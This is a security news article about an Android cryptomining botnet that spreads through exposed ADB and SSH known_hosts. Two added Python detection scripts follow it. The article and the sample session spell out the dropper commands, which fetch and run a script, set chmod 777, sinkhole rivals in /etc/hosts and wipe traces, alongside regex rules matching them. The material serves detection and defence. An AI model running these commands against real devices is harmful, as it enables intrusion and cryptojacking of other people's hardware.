24 June 2019

New crypto-currency mining botnet targets Android devices via open ADB

A new cryptocurrency mining botnet has been discovered that spreads through the Android Debug Bridge (ADB) listening over Wi-Fi and, from devices it has already infected, over SSH. According to a report from Trend Micro, the malware has spread to 21 countries, with the highest infection rates observed in South Korea.

ADB over the network is disabled on most Android devices by default, but some ship with it enabled, leaving TCP port 5555 open to anyone who can reach the device. A connection to that port yields an unauthenticated ADB command shell, the same interface developers use to install and debug apps, and with it the ability to push and run arbitrary binaries on the device.

In the first stage of the attack, the host 45[.]67[.]14[.]179 connects to a device with ADB exposed and uses the ADB shell to change the working directory to “/data/local/tmp”. That directory is the standard staging location for this kind of dropper because the unprivileged adb shell user can both write to it and execute from it, which is not true of most of the filesystem that user can reach.

The bot then runs a series of checks to decide whether it has landed in a honeypot and which operating system the target runs. Next it downloads the payload with wget, falling back to curl if wget is not present on the system, runs “chmod 777 a.sh” to make the downloaded script world-readable, world-writable and executable, executes it, and finally runs a series of commands to remove its traces.

Once downloaded, the payload selects one of three miners based on the infected system’s manufacturer, architecture, processor type and hardware. All three miners are served from the same URL.

“To optimize the mining activity, the script also enhances the victim’s memory by enabling HugePages, which will help the system support memory pages that are greater than its default size. This ability can be seen in the script as ‘/sbin/sysctl -w vm.nr_hugepages=128’,” the researchers note.

The bot also goes after rival cryptocurrency miners if it finds them on the device. It appends the record “0.0.0.0 miningv2.duckdns.org” to /etc/hosts, so that the hostname used by the competing miner resolves to a non-routable address and the competitor can no longer reach its server.
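The steps described above make a compact indicator set for anyone hunting this activity in ADB shell logs, dropped scripts or recovered shell history. The Python below is an added example, not tooling from the report: it runs simple rules over a constructed transcript shaped like the session the article describes (the transcript, the `example.invalid` URL and the rule names are all mine), flags the ordered staging-dir → download → chmod 777 chain as the high-confidence signal, and separately checks a hosts file for the sinkhole entry. The hosts-file check generalises beyond the single record in the text to any name pinned to 0.0.0.0 or 127.0.0.1.

```python
import re

# Constructed sample of what the ADB-shell session / dropper looks like. This is
# NOT a capture from the Trend Micro report; it mirrors the steps the article lists.
SAMPLE_SESSION = """\
cd /data/local/tmp
uname -a
wget http://example.invalid/a.sh -O a.sh || curl -o a.sh http://example.invalid/a.sh
chmod 777 a.sh
./a.sh
/sbin/sysctl -w vm.nr_hugepages=128
echo "0.0.0.0 miningv2.duckdns.org" >> /etc/hosts
rm -f a.sh
"""

# Constructed hosts file containing the sinkhole record from the article.
SAMPLE_HOSTS = """\
127.0.0.1 localhost
::1 ip6-localhost
0.0.0.0 miningv2.duckdns.org   # added by the bot
"""

# Each rule is (name, pattern). Names are mine; patterns follow the commands quoted
# in the article (cd to the staging dir, wget/curl fetch, chmod 777, hugepages sysctl,
# a 0.0.0.0 record appended to /etc/hosts, and the rm clean-up).
RULES = [
    ("staging-dir",    re.compile(r"\bcd\s+/data/local/tmp\b")),
    ("downloader",     re.compile(r"\b(wget|curl)\b.*\bhttps?://")),
    ("world-exec",     re.compile(r"\bchmod\s+777\b")),
    ("hugepages",      re.compile(r"sysctl\s+-w\s+vm\.nr_hugepages=")),
    ("hosts-sinkhole", re.compile(r"0\.0\.0\.0\s+\S+.*>>?\s*/etc/hosts")),
    ("cleanup",        re.compile(r"\brm\s+-[rf]+\s")),
]

LOCAL_NAMES = {"localhost", "localhost.localdomain", "ip6-localhost",
               "ip6-loopback", "broadcasthost"}


def scan_session(text):
    """Return (line_number, rule_name, line) for every line matching a rule,
    in line order."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for name, pattern in RULES:
            if pattern.search(line):
                hits.append((lineno, name, line))
    return hits


def is_dropper_chain(hits, window=10):
    """True when staging-dir, downloader and world-exec appear in that order within
    `window` lines: the initial-stage sequence the article describes. Any single
    rule alone (a developer running chmod 777, say) is too noisy on its own."""
    positions, start = [], 0
    for wanted in ("staging-dir", "downloader", "world-exec"):
        found = next((ln for ln, name, _ in hits if name == wanted and ln >= start), None)
        if found is None:
            return False
        positions.append(found)
        start = found
    return positions[-1] - positions[0] <= window


def sinkholed_hosts(hosts_text):
    """Hostnames pinned to 0.0.0.0 or 127.0.0.1 that are not the usual loopback
    names. Ad-blocking hosts files produce the same pattern, so treat a hit as a
    lead to review, not proof of compromise."""
    out = []
    for line in hosts_text.splitlines():
        line = line.split("#", 1)[0].strip()   # drop comments
        if not line:
            continue
        addr, *names = line.split()
        if addr in ("0.0.0.0", "127.0.0.1"):
            out.extend(n for n in names if n not in LOCAL_NAMES)
    return out


if __name__ == "__main__":
    for lineno, name, line in scan_session(SAMPLE_SESSION):
        print(f"{lineno:>3} {name:<15} {line}")
    print("dropper chain:", is_dropper_chain(scan_session(SAMPLE_SESSION)))
    print("sinkholed:", sinkholed_hosts(SAMPLE_HOSTS))
```

Feed `scan_session` the text of `adb logcat`, a recovered `a.sh`, or shell history from a suspect device; the chain check is what separates this dropper from ordinary developer activity, while `hugepages` and `hosts-sinkhole` hits on an Android device are unusual enough to be worth a look on their own.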

One of the more interesting aspects of this botnet is its SSH spreading mechanism, which targets the systems listed in the known_hosts file of a compromised device. known_hosts only records which hosts the device has connected to before; the spreader still depends on the compromised device holding an SSH key (or other cached credential) that those hosts accept.

“Being a known device means the system can communicate with the other system without any further authentication after the initial key exchange, i.e., each system considers the other as safe. The combination of known hosts and the victim’s public key makes it possible for the malware to connect to smart devices or systems that have previously connected to the infected system,” explains Trend Micro.

Once connected via SSH to another target, the malware uses two spreader scripts to download, install, and launch a miner payload.
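What this spreader harvests is the host list, which is why OpenSSH's `HashKnownHosts yes` option matters here: with it on, each host field is stored as `|1|base64(salt)|base64(HMAC-SHA1(salt, hostname))`, so a reader of the file learns nothing without guessing hostnames. The Python below is an added example, not part of the report or of OpenSSH: it builds a hashed entry in that format, verifies one against a candidate hostname the way ssh does, and shows how many hosts a file in each form gives away. The known_hosts content and key blobs are constructed for the example. Hashing the file removes the target list; it does not remove the trust, so the key the compromised device holds still needs to be rotated.

```python
import base64
import hashlib
import hmac
import os


def hash_entry(hostname, salt=None):
    """Produce the |1|salt|hash host field OpenSSH writes when HashKnownHosts=yes:
    HMAC-SHA1 keyed with a 20-byte salt over the hostname, both base64-encoded."""
    salt = salt or os.urandom(20)
    digest = hmac.new(salt, hostname.encode(), hashlib.sha1).digest()
    return "|1|%s|%s" % (base64.b64encode(salt).decode(), base64.b64encode(digest).decode())


def hashed_entry_matches(host_field, hostname):
    """True if a hashed host field is for `hostname`; this is the only way to
    learn a hostname from a hashed entry, one guess at a time."""
    if not host_field.startswith("|1|"):
        return False
    _, _, salt_b64, digest_b64 = host_field.split("|", 3)
    salt = base64.b64decode(salt_b64)
    expected = hmac.new(salt, hostname.encode(), hashlib.sha1).digest()
    return hmac.compare_digest(expected, base64.b64decode(digest_b64))


def harvestable_hosts(known_hosts_text):
    """Return (plaintext hostnames an attacker can lift directly, count of hashed
    entries that give nothing away). Handles comma-separated host lists, the
    [host]:port form and @cert-authority / @revoked markers."""
    plain, hashed = [], 0
    for line in known_hosts_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("@"):                 # marker, then the normal fields
            line = line.split(None, 1)[1]
        host_field = line.split(None, 1)[0]
        if host_field.startswith("|1|"):
            hashed += 1
            continue
        for h in host_field.split(","):
            if h.startswith("[") and "]:" in h:  # [host]:port -> host
                h = h[1:h.index("]")]
            plain.append(h)
    return plain, hashed


# Constructed known_hosts content (not from the report). Two plaintext entries and one
# hashed entry for nas.example.internal with a fixed salt so the example is repeatable.
FIXED_SALT = b"\x01" * 20
SAMPLE_KNOWN_HOSTS = (
    "# constructed example\n"
    "build-server.example.internal ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIExampleKeyDataOnly\n"
    "[camera-01.example.internal]:2222,10.0.0.7 ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQexample\n"
    + hash_entry("nas.example.internal", FIXED_SALT)
    + " ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIExampleKeyDataOnly\n"
)


if __name__ == "__main__":
    plain, hashed = harvestable_hosts(SAMPLE_KNOWN_HOSTS)
    print("harvestable:", plain)
    print("hashed entries (need guessing):", hashed)
    field = hash_entry("nas.example.internal", FIXED_SALT)
    print("guess 'nas.example.internal':", hashed_entry_matches(field, "nas.example.internal"))
    print("guess 'backup.example.internal':", hashed_entry_matches(field, "backup.example.internal"))
```

Run `harvestable_hosts` over the known_hosts files of devices and automation accounts in scope; any plaintext entry is a hop the spreader can attempt. Converting an existing file is `ssh-keygen -H -f ~/.ssh/known_hosts`; pair that with per-host keys or certificate authentication so one compromised device cannot reach everything it has ever talked to.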
